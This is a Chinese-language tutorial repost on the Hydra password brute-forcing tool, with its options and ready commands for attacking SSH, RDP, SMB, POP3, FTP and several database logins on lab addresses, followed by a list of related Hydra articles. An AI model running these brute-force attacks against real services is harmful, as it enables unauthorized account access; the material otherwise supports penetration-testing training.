网络安全:Hydra 端口爆破工具.(九头蛇)

这篇具有很好参考价值的文章主要介绍了网络安全:Hydra 端口爆破工具.(九头蛇)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

应用协议安全:Hydra 端口爆破工具.(九头蛇)

Hydra 也叫九头蛇,是一款开源的暴力PJ工具,集成在kali当中。可以对多种服务的账号和密码进行爆破,包括 Web 登录、数据库、SSH、FTP 等服务.


目录:

应用协议安全:Hydra 端口爆破工具.(九头蛇)

Hydra(九头蛇)使用:

使用方法:直接打开 kali 终端,输入.

(1)实战:爆破 SSH 协议.( 22 端口 )

(2)实战:爆破 远程桌面 RDP.( 3389 端口 )

(3)实战:爆破 共享文件 SMB ( 445 端口 )

(4)实战:爆破 邮箱协议 POP3( 110 端口 )

(5)实战:爆破 文件传输 FTP ( 21 端口 )

(6)实战:爆破 MSSQL数据库( 1433 端口 )

(7)实战:爆破 MySQL数据库( 3306 端口 )

(8)实战:爆破 Oracle数据库( 1521 端口 )

(9)实战:爆破 Redis数据库( 6379 端口 )

(10)实战:爆破 PgSQL数据库( 5432 端口 )


免责声明:

严禁利用本文章中所提到的技术进行非法攻击,否则后果自负,上传者不承担任何责任。


Hydra(九头蛇)使用的参数:

-s 指定端口

-l 指定用户名

-L 指定用户名字典(文件)

-p 指定密码破解

-P 指定密码字典(文件)

-o 保存执行结果

-e 空密码探测和指定用户密码探测(ns)

-C 用户名可以用:分割(username:password)

-vV 显示详细过程

Hydra(九头蛇)使用:

使用方法:直接打开 kali 终端,输入.

hydra

端口爆破工具,渗透测试 领域.,# 安全测试工具领域.,内网安全 领域.,web安全,linux,安全,网络安全


(1)实战:爆破 SSH 协议.( 22 端口 )

hydra -L /root/root.txt -P /root/root.txt 192.168.0.105 ssh

-L 指定用户名字典(文件)

-P 指定密码字典(文件)

端口爆破工具,渗透测试 领域.,# 安全测试工具领域.,内网安全 领域.,web安全,linux,安全,网络安全

ssh iwebsec@192.168.0.105            //登录 ssh (22端口)

ssh 账号@地址

端口爆破工具,渗透测试 领域.,# 安全测试工具领域.,内网安全 领域.,web安全,linux,安全,网络安全


(2)实战:爆破 远程桌面 RDP.( 3389 端口 )

hydra -l administrator -P /root/root.txt 192.168.0.106 rdp -vV

-l 指定用户名

-P 指定密码字典(文件)

-vV 显示详细过程

端口爆破工具,渗透测试 领域.,# 安全测试工具领域.,内网安全 领域.,web安全,linux,安全,网络安全

rdesktop 192.168.0.106:3389        //登录远程桌面3389

rdesktop 地址:3389 

端口爆破工具,渗透测试 领域.,# 安全测试工具领域.,内网安全 领域.,web安全,linux,安全,网络安全


(3)实战:爆破 共享文件 SMB ( 445 端口 )

hydra -l administrator -P /root/root.txt 192.168.0.106 smb

-l 指定用户名

-P 指定密码字典(文件)

端口爆破工具,渗透测试 领域.,# 安全测试工具领域.,内网安全 领域.,web安全,linux,安全,网络安全


(4)实战:爆破 邮箱协议 POP3( 110 端口 )

hydra  -L /root/root.txt -P /root/root.txt 192.168.0.105 pop3 -vV

-L 指定用户名字典(文件)

-P 指定密码字典(文件)

-vV 显示详细过程

(5)实战:爆破 文件传输 FTP ( 21 端口 )

hydra  -L /root/root.txt -P /root/root.txt 192.168.0.105 ftp -vV

-L 指定用户名字典(文件)

-P 指定密码字典(文件)

-vV 显示详细过程

(6)实战:爆破 MSSQL数据库( 1433 端口 )

hydra -l sa -P /root/root.txt 192.168.0.106 mssql -vV 

-l 指定用户名

-P 指定密码字典(文件)

-vV 显示详细过程

(7)实战:爆破 MySQL数据库( 3306 端口 )

hydra -L /root/root.txt -P /root/root.txt 192.168.0.106 mysql -vV 

-L 指定用户名字典(文件)

-P 指定密码字典(文件)

-vV 显示详细过程

(8)实战:爆破 Oracle数据库( 1521 端口 )

hydra -L /root/root.txt -P /root/root.txt 192.168.0.106 oracle -vV 

-L 指定用户名字典(文件)

-P 指定密码字典(文件)

-vV 显示详细过程

(9)实战:爆破 Redis数据库( 6379 端口 )

hydra -L /root/root.txt -P /root/root.txt 192.168.0.106 redis -vV 
 
-L 指定用户名字典(文件)

-P 指定密码字典(文件)

-vV 显示详细过程

(10)实战:爆破 PgSQL数据库( 5432 端口 )

hydra -L /root/root.txt -P /root/root.txt 192.168.0.106 postgresql -vV

-L 指定用户名字典(文件)

-P 指定密码字典(文件)

-vV 显示详细过程

     

      文章来源地址https://www.toymoban.com/news/detail-636578.html

      

到了这里,关于网络安全:Hydra 端口爆破工具.(九头蛇)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Hydra密码爆破工具使用教程图文教程(超详细)

    「作者简介」: CSDN top100、阿里云博客专家、华为云享专家、网络安全领域优质创作者 「推荐专栏」: 对网络安全感兴趣的小伙伴可以关注专栏《网络安全入门到精通》 Hydra也叫九头蛇,是一款开源的暴力PJ工具,集成在kali当中。 参数: -l 指定用户名 -p 指定密码 -L 指定用

    2024年02月06日
    浏览(50)
  • 第六天 01-hydra工具windows远程桌面的密码爆破

    RDP是Windows的远程桌面协议。所占用的端口默认为3389,这个是可以修改的。 爆破工具:kali使用hydra(九头蛇)工具进行密码爆破。 hydra语法: ​ hydra IP地址 rdp -l 用户名 -P 密码字典 -V rdp 即RDP协议 -l 小写的l 后面加单用户名,已知用户名 -L 大写的L后面加的是用户名字典,破

    2023年04月08日
    浏览(49)
  • kali linux网络安全弱口令爆破常用命令(二)

    Kali Linux中的Hydra是一款强大的网络登录破解工具,它支持多种协议,如FTP、SSH、Telnet等。弱口令爆破是一种常见的网络攻击手段,通过尝试不同的用户名和密码组合来获取系统的访问权限。Hydra是一款强大的暴力破解工具,可以用于执行弱口令爆破。 1. 主机(Host): 要尝试

    2024年02月03日
    浏览(49)
  • [CTF/网络安全]BurpSuite爆破实战解题详析之BUUCTF Brute 1

    免责声明:本文仅分享AntSword渗透相关知识,不承担任何法律责任。 请读者自行安装BurpSuite,本文不再赘述。 在用户名和密码都未知的情况下,进行用户名、密码的组合爆破,效率极低。 先爆破用户名,再利用得到的用户名爆破密码,将提高爆破速度。 题目 操作 Burp抓包

    2024年02月06日
    浏览(50)
  • 九头蛇3389远程爆破

    1.初学KALI hydra(海德拉)。 实验环境:VM16,虚拟机两台,Windows10系统,KALI系统,用nmap查看目标端口是否开放。 2.在KALI虚拟机上面使用命令nmap查看WIN10的3389端口是否打开。 3.在KALI虚拟机上面建立用户名和密码两个弱口令的文本文件。 4.使用海德拉工具Hydra(海德拉)工具进行

    2024年02月04日
    浏览(23)
  • 端口扫描-安全体系-网络安全技术和协议

    全TCP连接:三次握手 半打开式扫描:前两次握手 FIN扫描:不用建立TCP连接 第三方扫描: 拒绝服务攻击有: 同步包风暴 ICMP攻击 SNMP攻击 都是修改注册表来防御攻击 考察这三种拒绝服务攻击的原理 a 由低到高,一共五个等级 自主保护级 系统审计保护级:粒度更细的自主保护级 安全标

    2024年02月09日
    浏览(42)
  • 网络安全之端口扫描

    1、扫描三步曲 一个完整的网络安全扫描分为三个阶段: 第一阶段:发现目标主机或网络 (端口扫描) 第二阶段:发现目标后进一步搜集目标信息,包括操作系统类型、运行的服务以及服务软件的版本等。如果目标是一个网络,还可以进一步发现该网络的拓扑结构、路由设

    2024年02月13日
    浏览(36)
  • 高级网络安全管理员 - 网络设备和安全配置:交换机端口安全配置

    Cisco Packet Tracer 是由Cisco公司发布的一个辅助学习工具,为学习思科网络课程的初学者去设计、配置、排除网络故障提供了网络模拟环境。用户可以在软件的图形用户界面上直接使用拖曳方法建立网络拓扑,并可提供数据包在网络中行进的详细处理过程,观察网络实时运行情况

    2024年02月03日
    浏览(58)
  • 网络安全--编码,服务端口,前端基础

    目录 1.编码 1)HTML编码:也称实体编码 2)URL 编码 3)TLS 的主要特性包括 4)服务的基本端口 5)MD5(Message Digest Algorithm 5)和 SHA(Secure Hash Algorithm) 2.编写from表单提交给后端 1)前端部分 2)后端部分(php) 1.编码 1)HTML编码:也称实体编码 1.对于待编码的字符,在 HTML 中找到

    2024年02月15日
    浏览(48)
  • 网络周,第五天:冗余技术-端口安全

            对不起,兄弟姐妹,由于我最近比较忙,一直没有更新稿子了,接下来的两周内,我每天争取两篇关于安全措施的稿子,来弥补大家。                                                     理解冗余技术、生成树、端口聚合、端口安全的基本概念。         冗

    2024年02月02日
    浏览(35)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包